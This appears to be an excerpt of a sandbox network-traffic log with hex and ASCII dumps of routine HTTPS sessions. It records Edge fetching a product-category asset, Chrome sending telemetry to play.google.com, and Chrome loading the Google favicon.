2024-07-26 18:10:29 UTC	1468	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 51 49 44 41 54 78 01 ed 97 4b 6c 54 55 18 c7 ff e7 4e 19 62 da e0 b0 a1 01 03 5c 82 51 7c 52 16 1a 6d 6b 42 57 c4 c7 c2 2e 8c 26 24 46 62 44 17 26 b4 04 62 5c a0 ad 1a 63 dc c8 82 85 89 26 b4 09 68 89 1a a7 18 79 24 1a c6 05 75 41 02 17 19 23 46 03 13 10 4a 35 c8 50 fa 9a b9 f7 9c cf ef 3c ee 74 a6 96 76 da a6 2b e6 4b 4f ef cc b9 e7 9e ef 77 ff df e3 de 01 6a 56 b3 9a d5 ec ce 36 81 45 b6 cd 67 28 85 89 89 14 22 f8 20 e9 4b 0f 29 41 22 25 3c ac 85 42 8a a4 f2 a9 a8 52 8d e1 c5 d4 d5 70 75 3e 49 de a6 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaQIDATxKlTUNb\Q\|RmkBW.&$FbD&b\c&hy$uA#FJ5P<tv+KOwjV6Eg(" K)A"%<BRpu>I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	64076	13.107.246.40	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:28 UTC	478	OUT	GET /assets/product_category_en/1.0.0/asset?assetgroup=ProductCategories HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: ProductCategories Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 18:10:29 UTC	559	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:10:29 GMT Content-Type: application/octet-stream Content-Length: 82989 Connection: close Last-Modified: Thu, 25 May 2023 20:28:02 GMT ETag: 0x8DB5D5E89CE25EB x-ms-request-id: 4aa37a84-501e-0056-03f9-de8077000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20240726T181029Z-15c77d89844zl5pb9v6h755qg4000000020000000000qcum Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-07-26 18:10:29 UTC	15825	IN	Data Raw: 0a 22 08 f2 33 12 1d 0a 0c 43 61 72 20 26 20 47 61 72 61 67 65 12 0d 42 65 6c 74 73 20 26 20 48 6f 73 65 73 0a 23 08 d7 2b 12 1e 0a 11 53 70 6f 72 74 73 20 26 20 4f 75 74 64 6f 6f 72 73 12 09 41 69 72 20 50 75 6d 70 73 0a 21 08 b8 22 12 1c 0a 0c 43 61 72 20 26 20 47 61 72 61 67 65 12 0c 42 6f 64 79 20 53 74 79 6c 69 6e 67 0a 34 08 c3 35 12 2f 0a 18 47 6f 75 72 6d 65 74 20 46 6f 6f 64 20 26 20 43 68 6f 63 6f 6c 61 74 65 12 13 53 70 69 63 65 73 20 26 20 53 65 61 73 6f 6e 69 6e 67 73 0a 27 08 a4 2c 12 22 0a 11 53 70 6f 72 74 73 20 26 20 4f 75 74 64 6f 6f 72 73 12 0d 53 6c 65 65 70 69 6e 67 20 47 65 61 72 0a 21 08 f5 36 12 1c 0a 0d 4c 61 77 6e 20 26 20 47 61 72 64 65 6e 12 0b 48 79 64 72 6f 70 6f 6e 69 63 73 0a 39 08 61 12 35 0a 11 42 6f 6f 6b 73 20 26 20 4d Data Ascii: "3Car & GarageBelts & Hoses#+Sports & OutdoorsAir Pumps!"Car & GarageBody Styling45/Gourmet Food & ChocolateSpices & Seasonings',"Sports & OutdoorsSleeping Gear!6Lawn & GardenHydroponics9a5Books & M
2024-07-26 18:10:29 UTC	16384	IN	Data Raw: 69 64 65 6f 20 47 61 6d 65 73 12 1b 4e 69 6e 74 65 6e 64 6f 20 53 79 73 74 65 6d 20 41 63 63 65 73 73 6f 72 69 65 73 0a 20 08 a2 26 12 1b 0a 10 54 6f 6f 6c 73 20 26 20 48 61 72 64 77 61 72 65 12 07 54 6f 69 6c 65 74 73 0a 2c 08 f3 28 12 27 0a 14 4b 69 74 63 68 65 6e 20 26 20 48 6f 75 73 65 77 61 72 65 73 12 0f 45 6c 65 63 74 72 69 63 20 4d 69 78 65 72 73 0a 21 08 c0 32 12 1c 0a 04 54 6f 79 73 12 14 53 61 6e 64 62 6f 78 20 26 20 42 65 61 63 68 20 54 6f 79 73 0a 35 08 a5 25 12 30 0a 18 47 6f 75 72 6d 65 74 20 46 6f 6f 64 20 26 20 43 68 6f 63 6f 6c 61 74 65 12 14 53 65 61 66 6f 6f 64 20 43 6f 6d 62 69 6e 61 74 69 6f 6e 73 0a 24 08 d7 27 12 1f 0a 10 48 6f 6d 65 20 46 75 72 6e 69 73 68 69 6e 67 73 12 0b 43 61 6b 65 20 53 74 61 6e 64 73 0a 2e 08 a4 28 12 29 0a Data Ascii: ideo GamesNintendo System Accessories &Tools & HardwareToilets,('Kitchen & HousewaresElectric Mixers!2ToysSandbox & Beach Toys5%0Gourmet Food & ChocolateSeafood Combinations$'Home FurnishingsCake Stands.()
2024-07-26 18:10:29 UTC	16384	IN	Data Raw: 26 20 47 61 72 61 67 65 12 1c 44 72 69 76 65 77 61 79 20 26 20 47 61 72 61 67 65 20 46 6c 6f 6f 72 20 43 61 72 65 0a 25 08 f0 2a 12 20 0a 0f 4f 66 66 69 63 65 20 50 72 6f 64 75 63 74 73 12 0d 50 61 70 65 72 20 50 75 6e 63 68 65 73 0a 2d 08 c1 2c 12 28 0a 11 53 70 6f 72 74 73 20 26 20 4f 75 74 64 6f 6f 72 73 12 13 42 69 63 79 63 6c 65 20 41 63 63 65 73 73 6f 72 69 65 73 0a 22 08 a2 27 12 1d 0a 10 48 6f 6d 65 20 46 75 72 6e 69 73 68 69 6e 67 73 12 09 4e 6f 76 65 6c 74 69 65 73 0a 16 08 f3 29 12 11 0a 05 4d 75 73 69 63 12 08 45 78 65 72 63 69 73 65 0a 22 08 8e 31 12 1d 0a 11 53 70 6f 72 74 73 20 26 20 4f 75 74 64 6f 6f 72 73 12 08 53 77 69 6d 6d 69 6e 67 0a 26 08 d4 21 12 21 0a 12 42 65 61 75 74 79 20 26 20 46 72 61 67 72 61 6e 63 65 12 0b 4d 61 6b 65 75 70 Data Ascii: & GarageDriveway & Garage Floor Care%* Office ProductsPaper Punches-,(Sports & OutdoorsBicycle Accessories"'Home FurnishingsNovelties)MusicExercise"1Sports & OutdoorsSwimming&!!Beauty & FragranceMakeup
2024-07-26 18:10:29 UTC	16384	IN	Data Raw: 6f 63 6b 20 50 61 72 74 73 0a 1b 08 be 29 12 16 0a 0d 4c 61 77 6e 20 26 20 47 61 72 64 65 6e 12 05 42 75 6c 62 73 0a 21 08 a3 21 12 1c 0a 12 42 65 61 75 74 79 20 26 20 46 72 61 67 72 61 6e 63 65 12 06 4d 61 6b 65 75 70 0a 2d 08 49 12 29 0a 11 42 6f 6f 6b 73 20 26 20 4d 61 67 61 7a 69 6e 65 73 12 14 42 75 73 69 6e 65 73 73 20 26 20 45 63 6f 6e 6f 6d 69 63 73 0a 23 08 d5 23 12 1e 0a 09 43 6f 6d 70 75 74 69 6e 67 12 11 45 78 70 61 6e 73 69 6f 6e 20 4d 6f 64 75 6c 65 73 0a 2f 08 a2 24 12 2a 0a 0b 45 6c 65 63 74 72 6f 6e 69 63 73 12 1b 43 44 20 50 6c 61 79 65 72 73 20 26 20 53 74 65 72 65 6f 20 53 79 73 74 65 6d 73 0a 1f 08 d4 26 12 1a 0a 10 48 6f 6d 65 20 46 75 72 6e 69 73 68 69 6e 67 73 12 06 51 75 69 6c 74 73 0a 22 08 86 23 12 1d 0a 10 43 6c 6f 74 68 69 6e Data Ascii: ock Parts)Lawn & GardenBulbs!!Beauty & FragranceMakeup-I)Books & MagazinesBusiness & Economics##ComputingExpansion Modules/$*ElectronicsCD Players & Stereo Systems&Home FurnishingsQuilts"#Clothin
2024-07-26 18:10:29 UTC	16384	IN	Data Raw: 65 72 73 0a 27 08 a6 2c 12 22 0a 11 53 70 6f 72 74 73 20 26 20 4f 75 74 64 6f 6f 72 73 12 0d 53 6c 65 65 70 69 6e 67 20 42 61 67 73 0a 24 08 bd 21 12 1f 0a 12 42 65 61 75 74 79 20 26 20 46 72 61 67 72 61 6e 63 65 12 09 46 72 61 67 72 61 6e 63 65 0a 28 08 63 12 24 0a 11 42 6f 6f 6b 73 20 26 20 4d 61 67 61 7a 69 6e 65 73 12 0f 4d 75 73 69 63 20 4d 61 67 61 7a 69 6e 65 73 0a 1e 08 8a 2b 12 19 0a 0f 4f 66 66 69 63 65 20 50 72 6f 64 75 63 74 73 12 06 52 75 6c 65 72 73 0a 2d 08 a9 33 12 28 0a 09 43 6f 6d 70 75 74 69 6e 67 12 1b 50 72 69 6e 74 65 72 20 50 61 72 74 73 20 26 20 41 74 74 61 63 68 6d 65 6e 74 73 0a 27 08 ef 23 12 22 0a 09 43 6f 6d 70 75 74 69 6e 67 12 15 54 68 69 6e 20 43 6c 69 65 6e 74 20 43 6f 6d 70 75 74 65 72 73 0a 37 08 bc 24 12 32 0a 0b 45 6c Data Ascii: ers',"Sports & OutdoorsSleeping Bags$!Beauty & FragranceFragrance(c$Books & MagazinesMusic Magazines+Office ProductsRulers-3(ComputingPrinter Parts & Attachments'#"ComputingThin Client Computers7$2El
2024-07-26 18:10:29 UTC	1628	IN	Data Raw: 0b 44 56 44 20 50 6c 61 79 65 72 73 0a 34 08 dc 36 12 2f 0a 0c 43 61 72 20 26 20 47 61 72 61 67 65 12 1f 53 6e 6f 77 6d 6f 62 69 6c 65 20 26 20 41 54 56 20 53 6b 69 73 20 26 20 52 75 6e 6e 65 72 73 0a 23 08 a2 21 12 1e 0a 12 42 65 61 75 74 79 20 26 20 46 72 61 67 72 61 6e 63 65 12 08 54 77 65 65 7a 65 72 73 0a 30 08 8e 33 12 2b 0a 0c 50 65 74 20 53 75 70 70 6c 69 65 73 12 1b 50 65 74 20 48 61 62 69 74 61 74 20 26 20 43 61 67 65 20 53 75 70 70 6c 69 65 73 0a 29 08 d4 23 12 24 0a 09 43 6f 6d 70 75 74 69 6e 67 12 17 44 69 67 69 74 61 6c 20 4d 65 64 69 61 20 52 65 63 65 69 76 65 72 73 0a 2a 08 f3 2b 12 25 0a 11 53 70 6f 72 74 73 20 26 20 4f 75 74 64 6f 6f 72 73 12 10 42 6f 61 74 20 4d 61 69 6e 74 65 6e 61 6e 63 65 0a 22 08 d7 26 12 1d 0a 10 48 6f 6d 65 20 46 Data Ascii: DVD Players46/Car & GarageSnowmobile & ATV Skis & Runners#!Beauty & FragranceTweezers03+Pet SuppliesPet Habitat & Cage Supplies)#$ComputingDigital Media Receivers*+%Sports & OutdoorsBoat Maintenance"&Home F

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	64077	142.250.185.142	443	3920	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:29 UTC	1132	OUT	POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 522 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" Content-Type: application/x-www-form-urlencoded;charset=UTF-8 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" X-Goog-AuthUser: 0 sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://accounts.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-26 18:10:29 UTC	522	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 22 32 32 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 31 38 32 38 2c 5b 5b 22 31 37 32 32 30 31 37 34 32 36 32 32 36 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,"22",null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],1828,[["1722017426226",null,null,null
2024-07-26 18:10:29 UTC	925	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://accounts.google.com Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=516=R6AXCkxUWuMyNXOsPODa58uOz3LBr7nLToGxfNvZ-cTlF0LvjEvbcKbAeCBEZ8QkXibOrtvgVPvtONOSimFG9HyXTv-XoLELcdl8mDhS8ofmMDtz0lqoA0RDhfNvbpCE3cKWL6xjAgdQjyKK5qU_93K62ar43IvGBMafQZLj4ok; expires=Sat, 25-Jan-2025 18:10:29 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Fri, 26 Jul 2024 18:10:29 GMT Server: Playlog Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Fri, 26 Jul 2024 18:10:29 GMT Connection: close Transfer-Encoding: chunked
2024-07-26 18:10:29 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-07-26 18:10:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	64078	142.250.185.142	443	3920	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:29 UTC	1132	OUT	POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 508 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" Content-Type: application/x-www-form-urlencoded;charset=UTF-8 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" X-Goog-AuthUser: 0 sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://accounts.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-26 18:10:29 UTC	508	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 22 32 32 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 31 38 32 38 2c 5b 5b 22 31 37 32 32 30 31 37 34 32 36 36 38 36 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,"22",null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],1828,[["1722017426686",null,null,null
2024-07-26 18:10:29 UTC	925	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://accounts.google.com Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=516=p00W0ZHrqEoAlc8HiKjWpkgCWCkyjyie6htqsebOipdwYrU-nZq3Vn2-Bw7B4kxedYuF3ZdMNGFLlsHaDS1WseTgxZWaEVLHs77zw05xEj_H8HPshR65VJRsplVywCt741DV0uPJYRYnXIO3NYaiuERgYr3ZnUzs1nQPph596rU; expires=Sat, 25-Jan-2025 18:10:29 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Fri, 26 Jul 2024 18:10:29 GMT Server: Playlog Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Fri, 26 Jul 2024 18:10:29 GMT Connection: close Transfer-Encoding: chunked
2024-07-26 18:10:29 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-07-26 18:10:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	64081	172.217.18.4	443	3920	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:29 UTC	1214	OUT	GET /favicon.ico HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=516=R6AXCkxUWuMyNXOsPODa58uOz3LBr7nLToGxfNvZ-cTlF0LvjEvbcKbAeCBEZ8QkXibOrtvgVPvtONOSimFG9HyXTv-XoLELcdl8mDhS8ofmMDtz0lqoA0RDhfNvbpCE3cKWL6xjAgdQjyKK5qU_93K62ar43IvGBMafQZLj4ok
2024-07-26 18:10:30 UTC	704	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 5430 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Fri, 26 Jul 2024 18:04:45 GMT Expires: Sat, 03 Aug 2024 18:04:45 GMT Cache-Control: public, max-age=691200 Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT Content-Type: image/x-icon Vary: Accept-Encoding Age: 345 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-26 18:10:30 UTC	686	IN	Data Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff Data Ascii: h& ( 0.v]X:X:rY
2024-07-26 18:10:30 UTC	1390	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea ff 3b 49 eb ff 95 9c f4 ff cf d2 fa ff d1 d4 fa ff 96 9d f4 ff 52 5e ed ff e1 e3 fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 30 00 00 00 00 fd fd fd 9d ff ff ff ff e8 ea fd ff 58 63 ee ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 6c 76 f0 ff ff ff ff ff ff ff ff ff fd fd fd 98 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd c3 ff ff ff ff f9 f9 fe ff a5 ac f6 ff 5d 69 ee ff 3c 4a eb Data Ascii: 7R8F2Vb5C;IR^0Xc5C5C5C5C5C5Clv]i<J
2024-07-26 18:10:30 UTC	1390	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff fd fd fd d0 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd fd fd 8b ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b1 d8 a3 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 60 a5 35 ff ca 8e 3e ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 87 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 25 fd fd fd fb ff ff ff ff ff ff ff ff ff ff ff ff c2 e0 b7 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 6e b6 54 ff 9f ce 8d ff b7 da aa ff b8 db ab ff a5 d2 95 ff 7b bc 64 ff 54 a8 35 ff 53 a8 34 ff 77 a0 37 ff e3 89 41 ff f4 85 42 ff f4 85 42 ff fc Data Ascii: S4S4S4S4S4S4S4S4S4S4S4S4S4S4`5>%S4S4S4S4S4S4nT{dT5S4w7ABB
2024-07-26 18:10:30 UTC	1390	IN	Data Raw: f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fb d5 bf ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd cb ff ff ff ff ff ff ff ff ff ff ff ff 46 cd fc ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 21 ae f9 ff fb fb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd c8 fd fd fd 9c ff ff ff ff ff ff ff ff ff ff ff ff 86 df fd ff 05 bc fb ff 05 bc fb ff 15 93 f5 ff 34 49 eb ff b3 b8 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: BBBBBBF!4I
